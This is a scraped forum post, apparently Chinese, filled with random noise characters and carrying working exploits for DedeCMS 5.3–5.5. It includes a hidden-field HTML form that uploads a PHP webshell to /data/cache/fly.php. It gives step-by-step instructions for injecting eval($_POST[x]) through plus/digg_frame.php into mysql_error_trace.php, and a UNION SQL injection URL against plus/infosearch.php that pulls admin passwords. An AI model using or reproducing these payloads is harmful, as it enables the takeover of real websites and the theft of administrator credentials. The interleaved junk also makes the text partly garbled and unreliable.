, X; x  H' C8 M<input type='hidden' name='cfg_softtype' value='php' />
4 ~4 d2 X6 L2 V9 L7 U<input type='hidden' name='cfg_mediatype' value='php' />/ X7 z+ ^+ y( H. D
<input type='hidden' name='f' value='form1.enclosure' />
5 c; h- K6 R& K$ B<input type='hidden' name='job' value='upload' />
% n- b: y* X9 p) s8 ]<input type='hidden' name='newname' value='fly.php' />
" ^. j# z7 Y2 ^Select U Shell <input type='file' name='uploadfile' size='25' />& w2 {- |) s5 ?$ d/ }- K6 C0 h
<input type='submit' name='sb1' value='确定' />3 q4 k) O' A5 F
</form>
( f' l+ ?* F* Q) D& p' z<br />It's just a exp for the bug of Dedecms V55...<br />7 P9 n, r3 h4 U2 I
Need register_globals = on...<br />
# g& {# {. F: Z: Y( b/ sFun the game,get a webshell at /data/cache/fly.php...<br />
7 O4 t# ~2 a, p8 v; k) {: k</body>: T5 _, r# H. J. U6 u) a
</html>
0 o2 w' r! S$ L$ ?/ G( S9 W8 g
: Q6 e8 U: X7 J4 p
+ |' [, b# q% s6 z& g) T* }

+ W0 B  [. A" h' j
0 o3 U1 D5 c6 M7 C- c% m
1 G+ {, V; ]7 e& f' u+ J1 I7 Y+ S
0 n+ y) \- a3 r, n& \! S. }+ o

/ f+ j$ \8 ]- ?' M+ i- k6 s
( \) [, r) P2 z$ ^织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
9 d$ l4 B+ N; o! ]! W- J* E! P+ T利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。: n, _* q3 t* A
1. 访问网址：& o5 @8 j" [4 K7 p
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>3 s! |+ H2 j5 k3 J* y' h& d
可看见错误信息( I) o5 B0 G- {. _+ x" v

5 n2 |- s+ B( e- C( d
5 @9 \: L6 w' a- u1 `5 w- l" l! p+ m7 W2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。) E9 M; s7 j1 U$ R
int(3) Error: Illegal double '1024e1024' value found during parsing
: U7 h. y3 D2 i9 xError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
" k! u6 L$ k. ]8 o- N
' Y9 X4 K- {3 h2 q# R
( b2 B* I; [$ U( _3 W, y" L3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是/ {- c- u: X; o0 e# a

8 [) O2 ^# K& Y4 ^. L; i* m1 D" u3 J. Y1 L7 V  J
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>, l) C4 N/ `' [( c

' M, ~5 E6 B' |0 g- [+ B2 s. a2 k, T2 N* Y% T8 j
按确定后的看到第2步骤的信息表示文件木马上传成功.* M7 i( }* H7 C% v  p. G

1 C  m- \8 m( T" x! ]. T: h' R. M! u
2 `: V4 _: e  T, R2 r" k( q8 @
; o; Q$ n2 ~; U/ w) h" [0 b

# g6 H$ X1 ?) h! _& ^5 S  P, C& n! s" D. {+ \5 l
, w5 S& f3 X/ H" W( H$ P
+ e( ^' h; Y  ]& l$ q/ R  C
2 e. x4 U2 R; x& ]8 |+ Q) F
' E, T& M+ P$ j! C  O9 G: I

: Z, @4 P! T' @. @. Z4 ]1 D7 b% q
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
6 Q0 J4 ?6 s# [$ v. C' mhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

		自动登录	找回密码
密码			立即注册